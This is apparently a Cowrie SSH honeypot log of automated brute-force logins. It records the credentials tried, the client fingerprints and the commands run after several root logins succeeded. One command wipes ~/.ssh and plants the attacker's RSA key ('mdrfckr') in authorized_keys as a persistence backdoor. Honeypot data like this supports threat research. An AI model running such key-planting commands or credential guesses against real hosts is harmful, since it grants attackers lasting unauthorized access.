{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:07:01.880449Z","src_ip":"212.227.235.229","session":"02522b78fb76"}
{"eventid":"cowrie.login.success","username":"root","password":"Password123.","message":"login attempt [root/Password123.] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:07:03.067726Z","src_ip":"212.227.235.229","session":"02522b78fb76"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:07:03.660860Z","src_ip":"212.227.235.229","session":"02522b78fb76"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:07:03.661535Z","src_ip":"212.227.235.229","session":"02522b78fb76"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:07:03.662585Z","src_ip":"212.227.235.229","session":"02522b78fb76"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:07:03.950404Z","src_ip":"212.227.235.229","session":"02522b78fb76"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:07:04.583134Z","src_ip":"212.227.235.229","session":"02522b78fb76"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T06:07:04.583823Z","src_ip":"212.227.235.229","session":"02522b78fb76"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T06:07:04.871930Z","src_ip":"212.227.235.229","session":"02522b78fb76"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:07:04.872855Z","src_ip":"212.227.235.229","session":"02522b78fb76"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51710,"dst_ip":"1.2.3.4","dst_port":22,"session":"811e5b151f12","protocol":"ssh","message":"New connection: 212.227.235.229:51710 (1.2.3.4:22) [session: 811e5b151f12]","sensor":"my-vps","timestamp":"2025-08-31T06:07:05.160140Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:07:05.160853Z","src_ip":"212.227.235.229","session":"811e5b151f12"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:07:05.449370Z","src_ip":"212.227.235.229","session":"811e5b151f12"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T06:07:06.643805Z","src_ip":"212.227.235.229","session":"811e5b151f12"}
{"eventid":"cowrie.session.closed","duration":"89.1","message":"Connection lost after 89.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:07:07.786096Z","src_ip":"212.227.235.229","session":"bd2e9e2d73e6"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:07:07.936058Z","src_ip":"212.227.235.229","session":"811e5b151f12"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52806,"dst_ip":"1.2.3.4","dst_port":22,"session":"a294b110bba4","protocol":"ssh","message":"New connection: 212.227.235.229:52806 (1.2.3.4:22) [session: a294b110bba4]","sensor":"my-vps","timestamp":"2025-08-31T06:07:08.219615Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:07:08.220427Z","src_ip":"212.227.235.229","session":"a294b110bba4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48160,"dst_ip":"1.2.3.4","dst_port":22,"session":"a1f903268d75","protocol":"ssh","message":"New connection: 212.227.235.229:48160 (1.2.3.4:22) [session: a1f903268d75]","sensor":"my-vps","timestamp":"2025-08-31T06:07:08.370157Z"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:07:08.507652Z","src_ip":"212.227.235.229","session":"a294b110bba4"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:07:09.146785Z","src_ip":"212.227.235.229","session":"a1f903268d75"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:07:09.148304Z","src_ip":"212.227.235.229","session":"a1f903268d75"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:07:09.698972Z","src_ip":"212.227.235.229","session":"a294b110bba4"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:07:09.987683Z","src_ip":"212.227.235.229","session":"a294b110bba4"}
{"eventid":"cowrie.session.closed","duration":"8.4","message":"Connection lost after 8.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:07:09.989026Z","src_ip":"212.227.235.229","session":"02522b78fb76"}
{"eventid":"cowrie.login.failed","username":"test3","password":"abc123","message":"login attempt [test3/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T06:07:14.759573Z","src_ip":"212.227.235.229","session":"a1f903268d75"}
{"eventid":"cowrie.session.closed","duration":"8.4","message":"Connection lost after 8.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:07:16.798264Z","src_ip":"212.227.235.229","session":"a1f903268d75"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38146,"dst_ip":"1.2.3.4","dst_port":22,"session":"9334e745e18e","protocol":"ssh","message":"New connection: 212.227.125.160:38146 (1.2.3.4:22) [session: 9334e745e18e]","sensor":"my-vps","timestamp":"2025-08-31T06:07:29.626132Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:07:30.071995Z","src_ip":"212.227.125.160","session":"9334e745e18e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:07:30.072638Z","src_ip":"212.227.125.160","session":"9334e745e18e"}
{"eventid":"cowrie.login.failed","username":"test3","password":"abc123","message":"login attempt [test3/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T06:07:31.886567Z","src_ip":"212.227.125.160","session":"9334e745e18e"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:07:33.484171Z","src_ip":"212.227.125.160","session":"9334e745e18e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46100,"dst_ip":"1.2.3.4","dst_port":22,"session":"3db21e26cecb","protocol":"ssh","message":"New connection: 212.227.125.160:46100 (1.2.3.4:22) [session: 3db21e26cecb]","sensor":"my-vps","timestamp":"2025-08-31T06:07:40.808758Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48974,"dst_ip":"1.2.3.4","dst_port":22,"session":"09a68feaa35a","protocol":"ssh","message":"New connection: 212.227.235.229:48974 (1.2.3.4:22) [session: 09a68feaa35a]","sensor":"my-vps","timestamp":"2025-08-31T06:07:42.739640Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:07:42.740438Z","src_ip":"212.227.235.229","session":"09a68feaa35a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:07:43.014269Z","src_ip":"212.227.235.229","session":"09a68feaa35a"}
{"eventid":"cowrie.login.failed","username":"ivan","password":"ivan","message":"login attempt [ivan/ivan] failed","sensor":"my-vps","timestamp":"2025-08-31T06:07:44.146409Z","src_ip":"212.227.235.229","session":"09a68feaa35a"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:07:45.422042Z","src_ip":"212.227.235.229","session":"09a68feaa35a"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:07:46.646527Z","src_ip":"212.227.125.160","session":"3db21e26cecb"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:07:46.648241Z","src_ip":"212.227.125.160","session":"3db21e26cecb"}
{"eventid":"cowrie.login.failed","username":"pi","password":"pi","message":"login attempt [pi/pi] failed","sensor":"my-vps","timestamp":"2025-08-31T06:07:53.948468Z","src_ip":"212.227.125.160","session":"3db21e26cecb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57214,"dst_ip":"1.2.3.4","dst_port":22,"session":"330a4b02b659","protocol":"ssh","message":"New connection: 212.227.235.229:57214 (1.2.3.4:22) [session: 330a4b02b659]","sensor":"my-vps","timestamp":"2025-08-31T06:07:54.617883Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:07:54.619757Z","src_ip":"212.227.235.229","session":"330a4b02b659"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:07:54.896191Z","src_ip":"212.227.235.229","session":"330a4b02b659"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57574,"dst_ip":"1.2.3.4","dst_port":22,"session":"c8b9493079ec","protocol":"ssh","message":"New connection: 212.227.235.229:57574 (1.2.3.4:22) [session: c8b9493079ec]","sensor":"my-vps","timestamp":"2025-08-31T06:07:55.871437Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:07:55.872743Z","src_ip":"212.227.235.229","session":"c8b9493079ec"}
{"eventid":"cowrie.login.success","username":"root","password":"rich","message":"login attempt [root/rich] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:07:56.037281Z","src_ip":"212.227.235.229","session":"330a4b02b659"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:07:56.127377Z","src_ip":"212.227.235.229","session":"c8b9493079ec"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:07:56.615179Z","src_ip":"212.227.235.229","session":"330a4b02b659"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:07:56.616132Z","src_ip":"212.227.235.229","session":"330a4b02b659"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:07:56.617378Z","src_ip":"212.227.235.229","session":"330a4b02b659"}
